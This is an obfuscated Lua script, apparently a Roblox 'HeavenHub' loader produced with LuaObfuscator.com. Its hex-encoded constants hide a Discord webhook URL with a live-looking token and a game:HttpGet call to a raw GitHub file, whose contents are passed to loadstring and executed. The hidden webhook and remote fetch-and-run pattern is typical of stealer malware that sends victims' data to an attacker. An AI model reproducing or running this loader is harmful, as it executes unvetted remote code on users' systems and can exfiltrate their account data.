--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(2 -(932 -(857 + 74)))) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=(1188 -(367 + 201)) -(555 + (991 -(214 + 713))) ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;return (v34 * (41 + 215)) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1;local v38=(v21(v36,878 -(282 + 595) ,1657 -(1523 + 114) ) * (((5 -3) + 0)^(45 -13))) + v35 ;local v39=v21(v36,21,1096 -(68 + 997) );local v40=((v21(v36,1302 -((409 -183) + 760 + 284) )==(4 -3)) and  -(118 -(32 + (1082 -(915 + 82))))) or (1 + (0 -0)) ;if (v39==(0 + 0)) then if (v38==(957 -(892 + 65))) then return v40 * (0 -0) ;else v39=1 -0 ;v37=0 -0 ;end elseif (v39==(2397 -(87 + 263))) then return ((v38==(180 -(67 + 113))) and (v40 * ((1 + 0)/(0 -0)))) or (v40 * NaN) ;end return v8(v40,v39-(753 + 270) ) * (v37 + (v38/((7 -5)^(1004 -(802 + 88 + 62))))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(0 -0)) then return "";end end v42=v3(v16,v19,(v19 + v41) -1 );v19=v19 + v41 ;local v43={};for v67=1188 -(1069 + 118) , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44~=(0 + 0)) then else local v73=0 + 0 ;while true do if (v73==(1 -0)) then v47={};v48={v45,v46,nil,v47};v73=6 -4 ;end if (v73~=2) then else v44=1;break;end if (v73==0) then v45={};v46={};v73=3 -2 ;end end end if (v44==(376 -(123 + 251))) then for v79=1,v24() do local v80=0 -0 ;local v81;local v82;local v83;local v84;while true do if (v80~=(698 -(208 + 490))) then else v81=0 + 0 ;v82=nil;v80=1;end if (v80~=(1 + 1)) then else while true do if (v81~=(837 -(660 + 176))) then else v84=nil;while true do if (v82~=(0 + 0)) then else local v112=202 -(14 + 188) ;local v113;while true do if (v112~=(675 -(534 + 141))) then else v113=0;while true do if (v113==0) then local v175=0;while true do if (v175==(1 + 0)) then v113=1;break;end if ((0 + 0)~=v175) then else v83=0 + 0 ;v84=nil;v175=1 -0 ;end end end if (v113~=(1 -0)) then else v82=2 -1 ;break;end end break;end end end if (v82~=1) then else while true do if (v83==0) then v84=v22();if (v21(v84,1,1)~=(0 + 0)) then else local v165=0;local v166;local v167;local v168;local v169;while true do if (v165~=(0 + 0)) then else v166=396 -(115 + 281) ;v167=nil;v165=2 -1 ;end if (v165~=2) then else while true do if (v166~=1) then else local v180=0;while true do if (v180==1) then v166=2 + 0 ;break;end if (v180~=(0 -0)) then else v169={v23(),v23(),nil,nil};if (v167==0) then local v191=0;local v192;while true do if (0==v191) then v192=0 -0 ;while true do if (v192~=0) then else v169[3]=v23();v169[4 -0 ]=v23();break;end end break;end end elseif (v167==1) then v169[8 -5 ]=v24();elseif (v167==2) then v169[3]=v24() -(2^(301 -(134 + 151))) ;elseif (v167~=3) then else local v197=1665 -(970 + 695) ;local v198;local v199;while true do if (v197~=0) then else v198=0;v199=nil;v197=1;end if ((1 -0)~=v197) then else while true do if (0==v198) then v199=0;while true do if (v199~=0) then else v169[1993 -(582 + 1408) ]=v24() -(2^16) ;v169[13 -9 ]=v23();break;end end break;end end break;end end end v180=1 -0 ;end end end if (v166==(7 -5)) then if (v21(v168,1825 -(1195 + 629) ,1 -0 )~=(242 -(187 + 54))) then else v169[782 -(162 + 618) ]=v50[v169[2]];end if (v21(v168,2 + 0 ,2)~=1) then else v169[3]=v50[v169[3]];end v166=3;end if (v166==(2 + 1)) then if (v21(v168,3,6 -3 )~=(1 -0)) then else v169[4]=v50[v169[1 + 3 ]];end v45[v79]=v169;break;end if (v166~=0) then else local v182=1636 -(1373 + 263) ;while true do if (v182~=1) then else v166=1001 -(451 + 549) ;break;end if (v182~=(0 + 0)) then else v167=v21(v84,2,4 -1 );v168=v21(v84,6 -2 ,1390 -(746 + 638) );v182=1;end end end end break;end if (v165==1) then v168=nil;v169=nil;v165=2;end end end break;end end break;end end break;end if (v81==0) then v82=0 + 0 ;v83=nil;v81=1;end end break;end if (v80==1) then v83=nil;v84=nil;v80=2;end end end for v85=1 -0 ,v24() do v46[v85-1 ]=v29();end return v48;end if (v44==1) then local v74=341 -(218 + 123) ;local v75;while true do if ((1581 -(1535 + 46))~=v74) then else v75=0 + 0 ;while true do if (v75~=(0 + 0)) then else local v109=560 -(306 + 254) ;while true do if (v109==(0 + 0)) then v49=v24();v50={};v109=1;end if (v109==1) then v75=1 -0 ;break;end end end if (v75~=(1469 -(899 + 568))) then else v44=2 + 0 ;break;end if (v75==(2 -1)) then local v110=0;while true do if (v110==1) then v75=605 -(268 + 335) ;break;end if (v110~=(290 -(60 + 230))) then else for v114=1,v49 do local v115=0;local v116;local v117;local v118;local v119;while true do if (v115~=1) then else v118=nil;v119=nil;v115=574 -(426 + 146) ;end if (v115==0) then v116=0 + 0 ;v117=nil;v115=1457 -(282 + 1174) ;end if (v115==(813 -(569 + 242))) then while true do if ((2 -1)~=v116) then else v119=nil;while true do if (v117==0) then local v177=0;local v178;while true do if (v177==0) then v178=0;while true do if (v178~=1) then else v117=1 + 0 ;break;end if (v178~=(1024 -(706 + 318))) then else local v189=0;local v190;while true do if ((1251 -(721 + 530))==v189) then v190=0;while true do if (v190==(1272 -(945 + 326))) then v178=1;break;end if (v190==0) then v118=v22();v119=nil;v190=2 -1 ;end end break;end end end end break;end end end if (v117~=1) then else if (v118==1) then v119=v22()~=(0 + 0) ;elseif (v118==(702 -(271 + 429))) then v119=v25();elseif (v118==3) then v119=v26();end v50[v114]=v119;break;end end break;end if (v116==0) then local v176=0;while true do if (v176~=1) then else v116=1;break;end if (v176~=(0 + 0)) then else v117=1500 -(1408 + 92) ;v118=nil;v176=1087 -(461 + 625) ;end end end end break;end end end v48[1291 -(993 + 295) ]=v22();v110=1 + 0 ;end end end end break;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v51,16));if v20 then local v104=v5(v70,v20);v20=nil;return v104;else return v70;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v52=0;local v53;local v54;local v55;local v56;while true do if (v52==(1172 -(418 + 753))) then return (v56 * (6389650 + 10387566)) + (v55 * (6755 + 58781)) + (v54 * ((1397 -(1249 + 73)) + 181)) + v53 ;end if ((0 + 0)==v52) then v53,v54,v55,v56=v1(v16,v19,v19 + ((190 + 342) -(406 + 123)) );v19=v19 + (1773 -(1749 + 20)) ;v52=(1146 -(466 + 679)) + (0 -0) ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v87=v61;local v88=v62;local v89=v63;local v90=v28;local v91=1;local v92= -1;local v93={};local v94={...};local v95=v12("#",...) -1 ;local v96={};local v97={};for v101=0,v95 do if (v101>=v89) then v93[v101-v89 ]=v94[v101 + 1 ];else v97[v101]=v94[v101 + 1 ];end end local v98=(v95-v89) + 1 ;local v99;local v100;while true do v99=v87[v91];v100=v99[1];if (v100<=9) then if (v100<=4) then if (v100<=1) then if (v100==0) then v91=v99[3];else local v121=0;local v122;local v123;while true do if (v121==1) then v97[v122 + 1 ]=v123;v97[v122]=v123[v99[4]];break;end if (v121==0) then v122=v99[2];v123=v97[v99[3]];v121=1;end end end elseif (v100<=2) then v91=v99[3];elseif (v100>3) then local v133=v99[2];local v134,v135=v90(v97[v133](v13(v97,v133 + 1 ,v99[3])));v92=(v135 + v133) -1 ;local v136=0;for v159=v133,v92 do v136=v136 + 1 ;v97[v159]=v134[v136];end else local v137=v99[2];v97[v137]=v97[v137](v13(v97,v137 + 1 ,v92));end elseif (v100<=6) then if (v100>5) then v97[v99[2]][v99[3]]=v99[4];else v97[v99[2]]();end elseif (v100<=7) then v97[v99[2]]=v99[3];elseif (v100==8) then local v139=v99[2];local v140,v141=v90(v97[v139](v13(v97,v139 + 1 ,v99[3])));v92=(v141 + v139) -1 ;local v142=0;for v162=v139,v92 do v142=v142 + 1 ;v97[v162]=v140[v142];end else local v143=0;local v144;local v145;while true do if (v143==0) then v144=v99[2];v145=v97[v99[3]];v143=1;end if (v143==1) then v97[v144 + 1 ]=v145;v97[v144]=v145[v99[4]];break;end end end elseif (v100<=14) then if (v100<=11) then if (v100==10) then v97[v99[2]]();elseif (v97[v99[2]]==v99[4]) then v91=v91 + 1 ;else v91=v99[3];end elseif (v100<=12) then do return;end elseif (v100>13) then do return;end else v97[v99[2]][v99[3]]=v99[4];end elseif (v100<=16) then if (v100>15) then if (v97[v99[2]]==v99[4]) then v91=v91 + 1 ;else v91=v99[3];end else v97[v99[2]]=v59[v99[3]];end elseif (v100<=17) then v97[v99[2]]=v99[3];elseif (v100>18) then v97[v99[2]]=v59[v99[3]];else local v152=v99[2];v97[v152]=v97[v152](v13(v97,v152 + 1 ,v92));end v91=v91 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v71=(v64/((5 -3)^(v65-((1291 + 610) -(106 + 1794)))))%((1 + 1)^(((v66-((1 -0) + 0)) -(v65-(2 -1))) + 1)) ;return v71-(v71%(2 -1)) ;else local v72=(116 -(4 + 110))^(v65-(585 -(57 + 527))) ;return (((v64%(v72 + v72))>=v72) and (1428 -(41 + 1386))) or (103 -(17 + 86)) ;end end v22=nil;v18=2;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313430363533303532383036383O3431362F4F546A7A47704E6F32506C5A317A66475F6B52703467596A756B5072685755387653487574766836317173676B48494354653571485A2O3968565554476E317338707951030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D6503093O004E69686C617232303103073O004875624E616D6503093O0048656176656E48756200163O0012113O00013O0026103O000D0001000200044O000D000100120F000100033O00300D00010004000500120F000100063O00120F000200073O002001000200020008001211000400094O0008000200044O001200013O00022O000A00010001000100044O001500010026103O00010001000100044O0001000100120F000100033O00300D0001000A000B00120F000100033O00300D0001000C000D0012113O00023O00044O000100012O000C3O00017O00",v9(),...);
